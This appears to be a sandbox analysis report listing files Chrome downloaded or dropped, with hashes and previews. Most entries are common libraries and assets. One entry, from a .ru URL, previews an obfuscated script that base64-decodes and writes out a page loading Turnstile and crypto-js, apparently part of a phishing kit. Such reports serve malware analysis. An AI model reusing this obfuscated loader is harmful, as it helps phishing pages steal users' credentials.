                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):1227
                                                                  Entropy (8bit):7.759921243098768
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:AA6D4461ADF23B781395A6595C3706C7
                                                                  SHA1:4B887C5ED6C9361CB8B86DE6C5A7C6E697F13C29
                                                                  SHA-256:0EB0E27C0AD4FC34D2BBD99C067F1D82F14417661B4A7F1B00B68CE98D58E13C
                                                                  SHA-512:49BB68DCCF6B4EB2C6EE346EDAD54F1F57445A8967298B6DCCD9E860F608CB60B787730B5F3D834A0A766DA09E39BC22408CEB6A738C4FA067B3EC9B2D40CFD2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...(...(........m....bKGD..............pHYs..........\.r....tIME........M.j...XIDATX..]h.U...;...I......J./..R..t.3I.-u."M......*.. J.....cUBI.K.R.Cfv7.....T...".X,..Y.tw...M.....O..8..o.=..s..RR..$..5....@`...u.%....3.EC....h...".....pJ"Nv....rY.....&...u...Z.i./.`,..3....2.?..};.Z/W........T`..A....nE.m.."......4...H.........p...d}.V!....r....N.w/b..........2......V)..F.y.I...%o..v..S[..y.....LN.......<{K.Z(].i|U.`2...'./....[)y...~..m.....:.zl..f}$...{..'.;.p.....`YF.xC.n....Q\.J.(.....KI......|..$..l..T)..H$#.B..0..7......%.)~U.wNQ.6;....p6.mP..B........~.....|..u../.:E~.......T....._G....W...S....n.x .=.y.......#.....C7.K....w`....`..)...lz../.-_.u._..c%y....[..}RT..jz?0...0..6...H$V....\N&27.}E..l.vE.G......8..}6.-3....}..9...p..~0.e{.)9....;yn...&kl.}...U...........8^....C.E........@..7Sh<j..Ni3..../..2...[.3E.$.6.U.=9O-.. ..{J...k .....4.d.b..........S......N{..../.n.q..P"w1w/.....#.>...-..H$V..z.@g.......%_.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (7669), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):20188
                                                                  Entropy (8bit):5.88125252830156
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:EC445A5CC9A08ECCFDFEE1593995B2CD
                                                                  SHA1:836A309D324C0231F4DA80B620995B3D96CE261C
                                                                  SHA-256:214E0DB63CF84A9E59491D317F6260FEDEF598FAB5368E9DA5361D2B9E46D1C1
                                                                  SHA-512:544782B2476F9FA6BB44A12590D1F1807B0EDD4AE2CEAA3DB1E5B88202CFA8AA4BCC5D4959D09A6B5CB9CC0F14C77E913D9B1B1EF5F88185D7E04719E5654BCD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://rda.ifyrorrz.ru/mEzron5/
                                                                  Preview:<script>../* The biggest risk is not taking any risk. */..if(atob("aHR0cHM6Ly9SZEEuaWZ5cm9ycnoucnUvbUV6cm9uNS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (2343)
                                                                  Category:dropped
                                                                  Size (bytes):52916
                                                                  Entropy (8bit):5.51283890397623
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                  SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                  SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                  SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):75
                                                                  Entropy (8bit):4.094537025438351
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:A43C7AC772122FE4D977D94876437F2A
                                                                  SHA1:CA7B2EF2734369BB815A7CFA49FFFA5C55BE8635
                                                                  SHA-256:029918E68AAC864A6F19969163941C2F437015C3ABC4A448CF35D7F2A0452955
                                                                  SHA-512:EF51F0915131A17F7AD354CEDA7C112F05E60438520F4304E3D72E58D9C97F9D4712AB125C7AD71381E3CF7AA5DD2F30D0DE4939D97AC2EF692A2A1DE215651F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:{error: {message: "The request returned an error. We have been notified."}}
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (1718)
                                                                  Category:downloaded
                                                                  Size (bytes):1772
                                                                  Entropy (8bit):4.925002252500436
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:486E65AA2B8146BB13BADA3580C210A0
                                                                  SHA1:2D6880C55C408198B6D5E388808186A49C1A8948
                                                                  SHA-256:B57250AC08F66CFB36AA0345DC183CE792CE93FB47B2D31FED198442D87C5D5D
                                                                  SHA-512:6EEFEDDEF01C40EC3E396794A0FAD6A37ED382D479BD6FFCB431062868ED4AA0EE1798054508075D6CFA9DB263FACC6BF3AF8E2DAB56204AF053BA8ABE9861AC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://static.coggle.it/assets/print.e09528cf818ae36d.css
                                                                  Preview:body.spa.workspace-open{overflow:visible}body.spa{background:#fff;font-family:Helvetica,Arial,Liberation Sans,Droid Sans Fallback,Nanum Gothic,Noto Sans,sans-serif;font-size:14px;-webkit-print-color-adjust:exact}code,kbd,pre,samp{font-family:Liberation Mono,monospace}.diagram-editor{background:#fff}#page,#page>.home-view,.coggle-workspace,.coggle-workspace .diagram-editor,.coggle-workspace .diagram-editor-scroll,body,html{background:#fff;display:inline-block;height:auto!important;margin:0;overflow:visible;padding:0;position:static;width:auto!important}html{height:0;width:0}.diagram-editor svg{position:static}#chat,#cheat,#diagram-header .back-chevron,#grayout,#history,#loading,#notifications,#print_select,#sidebar,#sidebar-icons,.banners,.dhint,.diagram-toolbar,.global-help-view,.home-overlay,.home-resources,.loadspinner,.notification-panel,.save-indicator{display:none!important;visibility:hidden!important}.coggle-workspace #diagram-header #logo{-webkit-filter:none!important;filter:non
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):88793
                                                                  Entropy (8bit):5.413865382969959
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:FD35981A337052CD3CCD82DC674FF76D
                                                                  SHA1:E11E8DF31D4748D5348ECEC37C01C4DA1549F321
                                                                  SHA-256:BD6E71E0A8F18B3DD4BBEB6FD673015FEC896BD92E17C11F3DC8FE96A06DE1F4
                                                                  SHA-512:9D7A20899C255FC008683F2DCAFDA6332B19B56CA88850661F25245DC4844059404D7D2FEE7C4249775ABA92A61F4870393FCCBAE8A74B12463CF903F05143E3
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:var StripeM=function(e){var t={};function n(r){if(t[r])return t[r].exports;var _=t[r]={i:r,l:!1,exports:{}};return e[r].call(_.exports,_,_.exports,n),_.l=!0,_.exports}return n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var _ in e)n.d(r,_,function(t){return e[t]}.bind(null,_));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=30)}([function(e,t,n){"use strict";(function(e){n.d(t,"a",(function(){retur
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (47520)
                                                                  Category:downloaded
                                                                  Size (bytes):47521
                                                                  Entropy (8bit):5.398500199255723
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:301F68F3D8317AB22D4021E266C9A853
                                                                  SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                  SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                  SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 108 x 187, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):3737
                                                                  Entropy (8bit):7.842691775395205
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:8DF60A6BF021139DBA838903EF1EA8ED
                                                                  SHA1:4E33AEEF3FF9A849639163B319E265039E8466CD
                                                                  SHA-256:312D2241DD40A5178BA3752894583723AA992ADD5B7AFACEB96BAB7387EDBBC3
                                                                  SHA-512:61E105795503AB196B5CA42424B75CA26FC89127272AAD37E1CCA8EBE550B35D27A777C7DF43FEA6F9943F5DE4221244514A26F72AE226B3851D7D19E40E47F7
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...l..........]{Z....sBIT....|.d.....pHYs.........J.kP....tEXtSoftware.www.inkscape.org..<.....IDATx..y.\e...OX.,"...RH..H. ...a',.3D.A....D..g....R3...* 0&.H.....g.7,.J.BMA!..DV...x..I......}.....>........w.mjz..)........5.a.A.*.E.!......4.u.a.G.....Q.........6..HZ.......{..l?:..S..X..HZ........XP..).a]B.....'x...$...a]@.:...../....4V.?,.I..7..q...[.^mX..^.,...f....m....6,.I..7.[u...`'.?...$..X.lQR...l/..+.I.'.....v..+.I..K.M.$..+.I..fm.$q=0...+.I[...g.......u..m....&I\...W.w::B.....I..9._.y.6.M$......$q.p..~.6..$M.n.^.$q.p...W|.6l.H....X+I...p./5{.6l.H.X..,I.\.(.s.U..".f.W..'I.m.......t0.m`.$..l....k.&@...%.*I...>...............m.:..j..@...W....%p...&{QmX.$...M.8....p..I..y..D..l....a..4.8!)..cVL..,.a@...e..$....}a.......k..I./.[M...l..+*H...N.x.......8..IZ......o....2...aE..w...$^..g.....a.^.\..$.W.H....Ce.......I....l/L.?<.Iz9..(...Y".iQR|`H....QA.m..3.L.K..7.x.$.O$.l.$......./.@.&iC".}.$.'..l...%..0I..9..'I<..i..I.2..I.0k.$..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (930), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):930
                                                                  Entropy (8bit):5.118473677411452
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:F5EADDB4DFC7E121ABA2112E1CA3EF2D
                                                                  SHA1:4C8617E748F288236BA239FE3EB2EE39DA929AA1
                                                                  SHA-256:34A85E78B5402C253C2BC4CF64426C2B6B18601602E8A9A71568139FB3EE6599
                                                                  SHA-512:A05791E2B1CEE4945B41F4504EC83DD846995AE70EC9A1882D650A745B13AE8389A8A423ECA56372C216D20029CED76FC76E841CEAE0E1A0B8BB9FD8F364769A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://m.stripe.network/inner.html
                                                                  Preview:<!doctype html><html><head><meta charset="utf-8"><title>StripeM-Inner</title></head><body><script>!function(){var e=document.createElement("script");e.defer=!0,e.src="out-4.5.44.js",e.onload=function(){var e;window.StripeM&&(e=window.location.hash,/ping=false/.test(e)||(e=(e=e.match(/version=(4|6)/))?e[1]:"4",window.StripeM.p({t:!0,v:e})),e=function(e){if(window.opener||window.parent||window)try{var i=((t=JSON.parse(e.data)).message||t).action,t=t.message?t.message.payload:t;switch(i){case"ping":window.StripeM.p({t:!0,o:{muid:t.muid,sid:t.sid,referrer:t.referrer,url:t.url,title:t.title,v2:t.v2},v:t.version||"4"});break;case"track":if(!t.source||!t.data)return;window.StripeM.b({muid:t.muid,sid:t.sid,url:t.url,source:t.source,data:t.data},t.version||"4")}}catch(e){}},window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onMessage",e))},document.body.appendChild(e)}()</script></body></html>
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                  Category:downloaded
                                                                  Size (bytes):5525
                                                                  Entropy (8bit):7.961202222662501
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                  SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                  SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                  SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                  Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65447)
                                                                  Category:downloaded
                                                                  Size (bytes):89501
                                                                  Entropy (8bit):5.289893677458563
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):702
                                                                  Entropy (8bit):7.342388885221229
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:D338AD08723518C3BDBC09D4A5139937
                                                                  SHA1:32B556B2C5C818F1DE3D55CF11062CB69A51E30C
                                                                  SHA-256:008986D25C067F372922592814F5186EEAAFC8AD825DD44EFB7EE43141264629
                                                                  SHA-512:5F4A8C7D6DF4CBCE0730FB58258816C5876E879DB762CADE9B484B2116D1901F163C05F0F50E5F1086BC30865430EBF7E971127095A876454A9E7812E65DADD4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://static.coggle.it/assets/i/toolbar-clone6dfc5bdd.png
                                                                  Preview:.PNG........IHDR...@...@......iq.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<....;IDATx..n.P....4Q..!S.){..BP.N!<C....`.P....../........a+o......[..a*.U+....=.~.......*n3.v.6&.....`.`c.....v.6&.....`.`s............V...BU....v.t8....!...$I^..k....v.t<...m..@..G.....6...!.....sE.Y.$..z.....E.g.Cp.\.)..N.<....#".t:.v...z...)..3....X,.".....>......y.#.2...4.....{..V...y......(.....J..8..x.1.odY..fSW._x.P.G1.\E..u..z.......,..a..&.....`.`c.....v.6&.....`.`c...".......}k.^....F./....`...^.4......p.F.p..O..7u...%...`.`c..jk?.....^U.....A..{.W.o..~...O..\.l>.{...-`2.......y.X.H...*.....C.@. .p.j.Ng.Y...*...n...d.`c.....v.6&..............M....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                  Category:dropped
                                                                  Size (bytes):35170
                                                                  Entropy (8bit):7.993096534744333
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:171A4DD9400708B88724B57D62B24A6A
                                                                  SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                  SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                  SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (651), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):651
                                                                  Entropy (8bit):5.675923891816646
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:F619125BAB7552E1318658FFCC1201A1
                                                                  SHA1:E36BCCD72C9D91014C5DB11ECCDBBA5332D296E9
                                                                  SHA-256:B0ACD9F1DB7921AB06E6038928FC1064BB7D208F70828260EE8CB7274C0EBBF2
                                                                  SHA-512:0C07739A099A68A3DD944789E4745992D3B89ABFDB5D7E24ACD28E49402997B55FC145F0D33884851DF2E49B047966708F5DE64B5816E7AE65B518A1038844BC
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://js.stripe.com/v3/controller-with-preconnect-f619125bab7552e1318658ffcc1201a1.html
                                                                  Preview:<!doctype html><html><head><link rel="preconnect" href="https://api.stripe.com" crossorigin/><meta charset="utf-8"/><meta http-equiv="origin-trial" content="AtD0WrnMwAPI4nWWCvreE+vpgPVz45SO/1fG1IZRNpBsdWZOZN6SKr0ynC11KuzrvT903WrEU+N9Ik/RpiCRTAEAAABbeyJvcmlnaW4iOiJodHRwczovL3N0cmlwZS5jb206NDQzIiwiZmVhdHVyZSI6IlRwY2QiLCJleHBpcnkiOjE3MzUzNDM5OTksImlzU3ViZG9tYWluIjp0cnVlfQ=="/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/shared-ba94595f3c19f106857cabd615a5ac59.js"></script><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/controller-7d778a6e91c82633a9fc73f284d32e86.js"></script></head><body></body></html>
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:1
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                  Category:dropped
                                                                  Size (bytes):16345
                                                                  Entropy (8bit):7.98960525258912
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                  SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                  SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                  SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                  Category:downloaded
                                                                  Size (bytes):673
                                                                  Entropy (8bit):7.6596900876595075
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:0E176276362B94279A4492511BFCBD98
                                                                  SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                  SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
